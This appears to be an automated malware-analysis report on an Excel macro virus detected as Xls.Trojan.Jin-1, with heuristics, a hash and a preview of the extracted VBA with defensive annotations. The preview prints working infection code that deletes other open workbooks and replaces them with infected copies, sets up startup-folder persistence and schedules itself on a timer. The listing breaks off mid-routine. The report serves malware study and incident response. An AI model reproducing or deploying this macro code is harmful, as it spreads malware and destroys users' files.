MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
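The sample is a macro-enabled Excel file identified by ClamAV as Xls.Trojan.Jin-1 (the Detection panel of this report spells the signature Xls.Trojan.Jini-1). The Auto_Open macro attempts to infect other open workbooks: it copies each target's worksheets into the infected workbook, deletes the target file, and saves the infected workbook under the target's path, so the macro code travels with what looks like the user's own file. It also saves a copy of itself as shn.xls in Excel's startup folder, so it is loaded whenever Excel starts, and re-runs its infection routine on a two-minute timer. The VBA code is designed to hide its presence (screen updating and alerts are switched off and the marker sheet "shn" is kept hidden) and to spread to other files.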
Heuristics 3
-
ClamAV: Xls.Trojan.Jin-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Xls.Trojan.Jin-1
-
VBA macros detected | medium | 1 related finding | OLE_VBA_MACROS | Document contains VBA macro code
-
Auto_Open macro | high | OLE_VBA_AUTO | Auto_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17134 bytes |

SHA-256: 45698aa6ec8dd3af70fd6a60e2f928190d4399eeb3c2ee02bafde1b9333b6b18
Detection
ClamAV:
Xls.Trojan.Jini-1
Obfuscation or payload:
unlikely
|
|||
Preview script: first 1,000 lines of the extracted script
' Analyst note: module header of the workbook's document module ("ThisWorkbook").
' Only Attribute lines are shown for it in this preview; no procedures appear
' before the next module header.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Analyst note: start of the standard module "Module1", which holds the
' procedures listed below.
Attribute VB_Name = "Module1"
' Module-level variable. It is assigned in shfstq as the difference between
' today's date and the date stored in cell B76 of the "shn" sheet, and is then
' compared with 30. It is declared As String although the value is a date difference.
Dim infperiod As String
Sub auto_open()
' Analyst summary (defensive annotation, code unchanged):
'   Entry point. Excel runs a macro named Auto_Open when the workbook is opened
'   with macros enabled. The routine does three things in order:
'     1. Replaces every other open, not-yet-marked workbook on disk with a copy
'        of this workbook that also contains the victim's worksheets.
'     2. Saves a copy of itself as "shn.xls" in Application.StartupPath if no
'        such file exists there yet (persistence).
'     3. Calls shfstq, which repeats the infection pass and re-schedules itself.
'   Indicators visible in this routine: a hidden worksheet named "shn", a file
'   "shn.xls" in Excel's startup folder, and a date stamp in cell B76 of "shn".
'Application.DisplayStatusBar = False
' Screen redraw is switched off, so the sheet deletion/copy below is not shown to the user.
Application.ScreenUpdating = False
'abc = MsgBox("AA", vbYesNo)
' All runtime errors are ignored from here on. In particular, reading
' Sheets("shn") in a workbook that has no such sheet fails silently and leaves
' virustag Empty, which is what marks a workbook as "not yet infected" below.
On Error Resume Next
'openworkbooks = Workbooks.Count
For Each w In Workbooks
' Skip the workbook that is currently active (the one carrying this macro at open time).
If w.Name <> ActiveWorkbook.Name Then
nameis = w.Name
' Infection marker: cell A1 of a sheet named "shn" in the candidate workbook.
virustag = Workbooks(nameis).Sheets("shn").Range("A1").Value
' Only workbooks whose name does not start with "Book" and that carry no marker
' are processed. NOTE(review): "Book" presumably targets Excel's default names
' for new, unsaved workbooks, which have no file on disk to replace - confirm.
If Left(nameis, 4) <> "Book" And virustag = Empty Then
infectedworkbook = ActiveWorkbook.Name
' Full path of the victim file; it is deleted and re-created further down.
tobeinfected = Workbooks(nameis).FullName
' Original path of the carrier, so it can be reopened after being saved elsewhere.
namesavetoreopen = Workbooks(infectedworkbook).FullName
' The two sheet counts are assigned but not used in the visible code.
totalworksheets = Workbooks(nameis).Worksheets.Count
totalworksheets2 = Workbooks(infectedworkbook).Worksheets.Count
Workbooks(infectedworkbook).Sheets("Shn").Visible = True
' Suppresses Excel's confirmation dialogs (sheet deletion, overwrite prompts).
Application.DisplayAlerts = False
' Deletes every sheet except "shn". Worksheets is unqualified here, so it
' refers to the active workbook.
For Each ws In Worksheets
If ws.Name <> "shn" Then
ws.Delete
End If
Next ws
' The victim's worksheets are copied into the carrier, in front of "shn",
' so the resulting file shows the victim's content.
Workbooks(nameis).Worksheets.Copy Before:=Workbooks(infectedworkbook).Sheets("shn")
' The marker sheet is hidden again.
Workbooks(infectedworkbook).Sheets("shn").Visible = False
' NOTE(review): written with "=" rather than ":=", so this is a comparison
' expression passed positionally, not the named SaveChanges argument.
' The effective close behaviour should be confirmed dynamically.
Workbooks(nameis).Close savechanges = False
' The victim's original file is deleted from disk ...
Kill tobeinfected
' ... and the carrier (macro code + "shn" sheet + copied victim sheets) is
' saved under the victim's path. Because errors are ignored and Kill runs
' first, a failed SaveAs would leave the original file deleted with no
' replacement - relevant when assessing data loss during incident response.
Workbooks(infectedworkbook).SaveAs tobeinfected
' The carrier is reopened from its original location.
Workbooks.Open namesavetoreopen
End If
End If
virustag = Empty
Next
' Persistence: workbooks in Application.StartupPath are opened by Excel at startup.
xlstartpath = Application.StartupPath
' Dir returns "" when no file named shn.xls exists in the startup folder.
shnfile = Dir(xlstartpath & "\shn.xls")
If shnfile = "" Then
infectedworkbook = ActiveWorkbook.Name
namesavetoreopen = Workbooks(infectedworkbook).FullName
Workbooks(infectedworkbook).Sheets("Shn").Visible = True
Application.DisplayAlerts = False
' Strips all sheets except "shn" before saving the startup copy.
For Each ws In Worksheets
If ws.Name <> "shn" Then
ws.Delete
End If
Next ws
' Records today's date in B76; shfstq later compares the current date against it.
Workbooks(infectedworkbook).Sheets("Shn").Range("B76").Value = Date
' The workbook window is hidden before saving.
ActiveWindow.Visible = False
Workbooks(infectedworkbook).SaveAs xlstartpath & "\shn.xls"
'Application.EnableEvents = False
Workbooks.Open namesavetoreopen
'Windows("shn.xls").Close savechanges = True
'Application.EnableEvents = True
End If
' Hands over to the recurring infection routine defined below.
shfstq
'Application.OnTime Now + TimeValue("00:00:30"), "check_files"
End Sub
Sub shfstq()
' Analyst summary (defensive annotation, code unchanged):
'   Recurring routine. It repeats the infection pass of auto_open, but uses the
'   workbook named "shn.xls" as the carrier, restores "shn.xls" in the startup
'   folder if it is missing, triggers two further macros once more than 30 days
'   have passed since the date stored in B76, and re-schedules itself two
'   minutes ahead with Application.OnTime.
'   Of the two triggered macros, only the beginning of aista is visible in this
'   preview; payghamat is not shown.
'abc = MsgBox("Checking files", vbYesNo)
Application.ScreenUpdating = False
' Errors are ignored for the rest of the routine.
On Error Resume Next
' Records the name of the currently active workbook so it can be re-activated
' after an infection pass (see Workbooks(showworkbook).Activate below).
If IsError(aa = ActiveWorkbook.Name) = True Then
Else
showworkbook = ActiveWorkbook.Name
End If
'openworkbooks = Workbooks.Count
For Each w In Workbooks
' Every open workbook except the carrier itself is examined.
If w.Name <> "shn.xls" Then
nameis = w.Name
' Same infection marker as in auto_open: cell A1 of a sheet named "shn".
virustag = Workbooks(nameis).Sheets("shn").Range("A1").Value
If Left(nameis, 4) <> "Book" And virustag = Empty Then
infectedworkbook = "shn.xls"
tobeinfected = Workbooks(nameis).FullName
namesavetoreopen = Workbooks(infectedworkbook).FullName
' Assigned but not used in the visible code.
totalworksheets = Workbooks(nameis).Worksheets.Count
'totalworksheets2 = Workbooks(infectedworkbook).Worksheets.Count
' The carrier's window is made visible before the copy.
Windows(infectedworkbook).Visible = True
Application.DisplayAlerts = False
' The victim's worksheets are copied into the carrier, in front of "shn".
Workbooks(nameis).Worksheets.Copy Before:=Workbooks(infectedworkbook).Sheets("shn")
Workbooks(infectedworkbook).Sheets("shn").Visible = False
' NOTE(review): "=" rather than ":=" - a comparison passed positionally, not
' the named SaveChanges argument; confirm the effective behaviour dynamically.
Workbooks(nameis).Close savechanges = False
' The original victim file is deleted and the carrier is saved under its path.
' As in auto_open, the delete precedes the save and errors are ignored.
Kill tobeinfected
Workbooks(infectedworkbook).SaveAs tobeinfected
' The carrier is reopened from the path it had before the SaveAs.
Workbooks.Open namesavetoreopen
' Focus is returned to the workbook the user had active.
Workbooks(showworkbook).Activate
End If
End If
virustag = Empty
Next
' Re-creates the startup-folder copy if it is no longer present, so removing
' only that file while an infected workbook is open does not remove the persistence.
xlstartpath = Application.StartupPath
shnfile = Dir(xlstartpath & "\shn.xls")
If shnfile = "" Then
Workbooks("shn.xls").SaveAs xlstartpath & "\shn.xls"
End If
' Days elapsed since the date auto_open wrote to B76.
infperiod = Date - Workbooks("shn.xls").Sheets("shn").Range("B76").Value
' Time-delayed stage: after more than 30 days two additional macros are run.
If infperiod > 30 Then
Application.Run ("shn.xls!aista")
Application.Run ("shn.xls!payghamat")
End If
' Schedules this routine to run again two minutes from now; each run
' re-schedules the next, so the pass repeats while Excel stays open.
Application.OnTime Now + TimeValue("00:02:00"), "shn.xls!shfstq"
End Sub
Sub aista()
On Error Resume Next
Set mymenubar = CommandBars.ActiveMenuBar.Controls.Item(1)
'mymenubar.Delete
Set mymenubars = mymenubar.Controls.Item(1)
alread = mymenubars.Caption
If alread <> "Naya" Then
ST = 77
For changemenu = 1 To 12
Set mymenubars = mymenubar.Contr
... (truncated)
|
|||